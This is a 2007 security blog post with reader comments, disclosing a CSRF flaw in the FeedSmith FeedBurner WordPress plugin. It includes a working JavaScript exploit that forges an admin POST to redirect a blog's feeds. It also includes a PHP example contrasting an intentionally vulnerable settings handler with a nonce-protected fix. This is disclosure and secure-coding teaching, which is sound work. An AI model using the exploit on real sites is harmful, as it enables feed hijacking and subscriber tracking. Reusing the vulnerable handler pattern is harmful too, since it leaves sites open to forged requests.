The famous FeedSmith FeedBurner plugin is vulnerable to a CSRF attack that can allow an attacker to completely hijack blog feeds.

The popular feed service plugin page says this:

This plugin makes it easy to redirect 100% of traffic for your feeds to a FeedBurner feed you have created. FeedBurner can then track all of your feed subscriber traffic and usage and apply a variety of features you choose to improve and enhance your original WordPress feed.

In other words, if an attacker can control the FeedBurner plugin, 100% of feed traffic will be hijacked…. [and] can then be used to track all [hijacked] subscriber traffic and usage…

Proof of concept

// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.

// Settings page of the vulnerable plugin on the target blog.
var t = 'http://the-target/wordpress/wp-admin/options-general.php?page=FeedBurner_FeedSmith_Plugin.php';

// Form fields the settings page accepts; no nonce or other proof of origin is checked.
var p = 'redirect=true&feedburner_url=http://hijacking-your-feed.com/with/new/feed&' +
        'feedburner_comments_url=http://hijacking-your-comments.com/with/new/feed';

var feedburner_csrf = function(t, p) {

        var req = new XMLHttpRequest();
        var url = t;
        var params = p;
        req.open("POST", url);

        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.setRequestHeader("Content-length", params.length);
        req.setRequestHeader("Connection", "close");
        req.send(params);

};

feedburner_csrf(t, p);


Solution:

Some time ago I released a whitepaper detailing some common WordPress plugin security pitfalls. To resolve the issue, FeedBurner needs to apply a WP nonce as explained in that paper.
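To make the fix concrete, here is an added example (written for this page, not the FeedSmith plugin's own code) of a minimal WordPress settings handler for a feed-redirect option, first in the CSRF-prone shape the proof of concept above relies on, then hardened with a WP nonce and a capability check. The option name (fb_redirect_url), the page slug (fb-example) and the function names are assumptions chosen for illustration; the WordPress API calls (wp_nonce_field, check_admin_referer, current_user_can, update_option, esc_url_raw) are real core functions.

```php
<?php
// Added example, not the FeedSmith plugin's code. Option/page/function names
// (fb_redirect_url, fb-example, fb_example_*) are assumptions for illustration.

// --- Vulnerable shape: the POST is trusted simply because the admin's cookie
//     is valid, so a form or XHR submitted from any other site succeeds. ---
function fb_example_save_vulnerable() {
    if ( isset( $_POST['feedburner_url'] ) ) {
        // Nothing here proves the request came from our own settings form.
        update_option( 'fb_redirect_url', $_POST['feedburner_url'] );
    }
}

// --- Hardened shape ---

// Register the settings page under Settings; only users who may manage
// options can even see it.
function fb_example_register_page() {
    add_options_page( 'Feed redirect', 'Feed redirect', 'manage_options',
                      'fb-example', 'fb_example_render_form' );
}
add_action( 'admin_menu', 'fb_example_register_page' );

function fb_example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=fb-example' ) ); ?>">
        <?php
        // Emits a hidden field named fb_example_nonce whose value is tied to
        // the action, the current user and a time window. A third-party page
        // cannot read it (same-origin policy) and so cannot forge the POST.
        wp_nonce_field( 'fb_example_save', 'fb_example_nonce' );
        ?>
        <label>Feed URL
            <input type="url" name="feedburner_url"
                   value="<?php echo esc_attr( get_option( 'fb_redirect_url', '' ) ); ?>">
        </label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

function fb_example_save_hardened() {
    if ( ! isset( $_POST['feedburner_url'] ) ) {
        return; // nothing submitted
    }
    // 1. The caller must be allowed to change site options at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. The nonce must be present and valid for this action and this user;
    //    check_admin_referer() stops the request with an error page otherwise.
    check_admin_referer( 'fb_example_save', 'fb_example_nonce' );

    // 3. Only then accept the value, and only as a sanitised URL.
    $url = esc_url_raw( wp_unslash( $_POST['feedburner_url'] ) );
    if ( '' === $url ) {
        wp_die( 'Invalid feed URL.' );
    }
    update_option( 'fb_redirect_url', $url );
}
add_action( 'admin_init', 'fb_example_save_hardened' );
```

Two points worth keeping in mind when applying this pattern: the capability check and the nonce check answer different questions (is this user allowed to do this at all, and did this user actually intend this request), so both are needed; and a WordPress nonce is not a single-use token but a value valid for a limited time window, which is sufficient against cross-site forgery because the forging page can never obtain it in the first place.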

Google have already gotten back to me and a fix will be available shortly.

Update: 03/10/07: Fixed version released.


Comments

Marcin on 2 October, 2007 at 8:32 am #

I know of another way to mitigate/reduce the likelihood of exploitation. I would rather keep it private (hasn’t been verified to work), so Adrian, if you can, send me an email.


imjuk on 2 October, 2007 at 1:53 pm #

good catch on this. looks like a significant exploit in Feedburner. Am away to alter some of my posts on feedburner in light of this info.
Cheers
Mike


David Kierznowski on 2 October, 2007 at 3:17 pm #

Marcin, not sharing eh? :)

imjuk, from what I understand, the fix should be available any day.



[…] This does address the vulnerability released on BlogSecurity yesterday. […]


[…] by releasing version, has closed the security hole we mentioned on our page. After the news published on BlogSecurity, Feedburner closed the CSRF hole and returned to service […]


[…] to BlogSecurity version 2.2 is prone to CSRF (Cross-site request forgery) attack that can allow an attacker to […]


Warning! Warning! Danger! Danger! FeedSmith users on 4 October, 2007 at 11:51 pm #

[…] to Burning Question this potential security problem was brought to their attention by this post from Blog Security, Kudos to the Blog […]


[…] to Blog Security and FeedBurner […]


[…] reports of Hijacking feeds with Feedburner Vulnerability, the new release v2.3 ensures that the only person who may change […]


[…] of thousands of other blogs use the Feedburner service. A couple of weeks ago we released a vulnerability in Feedburner which allowed attackers to hijack your feed - this has since been resolved. Today, we will be […]


[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


AskApache on 24 October, 2007 at 5:44 am #

Great discovery! I’ve implemented the wp_nonce in all my plugins thanks to the security article you mentioned. I think it's smart to use as few plugins as possible. I like to rely on Apache mod_rewrite to redirect the feeds instead.


Feedburner Security Vulnerability on 28 December, 2007 at 6:47 pm #

[…] they can hijack your RSS feeds. After the news published on BlogSecurity, [Feedburner] closed the CSRF hole and returned to service […]


[…] the well-known WordPress plugin provided by FeedBurner has been cracked because of a vulnerability, and everyone who uses it to redirect their RSS feeds to FeedBurner risks […]
